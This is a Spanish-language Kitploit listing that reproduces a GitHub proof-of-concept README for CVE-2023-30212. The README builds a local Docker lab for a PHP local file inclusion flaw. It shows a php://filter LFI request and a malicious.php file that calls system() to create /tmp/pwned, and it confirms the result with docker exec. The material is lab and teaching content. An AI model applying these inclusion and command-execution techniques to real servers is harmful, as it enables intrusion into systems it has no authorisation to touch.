Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2023-30212 — PoC para CVE-2023-30212 usando Docker | Kitploit
Herramientas/GitHubGitHub/sungmin20/cve-2023-30212
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubsungmin20/cve-2023-30212

cve-2023-30212

PoC para CVE-2023-30212 usando Docker

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

cve-2023-30212

PoC para CVE-2023-30212 usando Docker

Configuración del entorno CVE-2023-30212 e informe PoC

📌 Resumen

Este informe contiene la configuración directa de un entorno web vulnerable basado en Docker para la vulnerabilidad CVE-2023-30212 (no disponible en Vulhub), y la demostración de dicha vulnerabilidad a través de un PoC.

  • Número CVE: CVE-2023-30212
  • Descripción de la vulnerabilidad: Posibilidad de ejecución remota de código mediante LFI (Local File Inclusion) en PHP
  • Dificultad: Avanzada (entorno no disponible en Vulhub)

🔧 Configuración del entorno

1. Configuración de Dockerfile y docker-compose

  • Imagen base: php:8.1-apache
  • Copia de vulnerable.php y malicious.php al directorio /var/www/html
  • Puerto 8088 expuesto para acceso externo Docker build

2. Descripción de los archivos principales

ArchivoDescripción
vulnerable.phpArchivo PHP con vulnerabilidad LFI
image image image image ---

🚀 Flujo de ejecución de la vulnerabilidad (PoC)

1. Ejecutar el contenedor

root@kitploit:~
docker-compose up -d

Nombre del contenedor: cve-2023-30212-cve-lfi-1

El servidor Apache se inicia y es accesible en http://localhost:8088

2. Verificar el código fuente del archivo malicioso basado en LFI

Llame a la siguiente URL para ver el contenido de malicious.php codificado en base64:

root@kitploit:~
http://localhost:8088/vulnerable.php?file=php://filter/convert.base64-encode/resource=malicious.php
base64

Al decodificar el resultado, se obtiene el siguiente código PHP:

root@kitploit:~
<?php system("touch /tmp/pwned"); ?>
image

3. Ejecución del comando y verificación del resultado

Llame a la siguiente URL para ejecutar realmente el comando:

root@kitploit:~
http://localhost:8088/malicious.php

Después de ejecutar el comando, debería crearse el archivo /tmp/pwned.

root@kitploit:~
docker exec -it cve-2023-30212-cve-lfi-1 ls /tmp

Si el archivo pwned aparece en el resultado, la prueba es exitosa.

archivo pwned

Resumen de resultados

  • Se logró verificar y decodificar el contenido del archivo malicioso mediante la vulnerabilidad LFI basada en php://filter
  • Se logró ejecutar comandos arbitrarios al invocar el PHP malicioso que contiene la función system()
  • PoC verificado exitosamente mediante la creación del archivo /tmp/pwned
Descargar herramienta
malicious.php
Archivo PHP malicioso que ejecuta comandos del sistema
docker-compose.ymlArchivo de configuración para el contenedor
DockerfileArchivo de configuración para la creación de la imagen Docker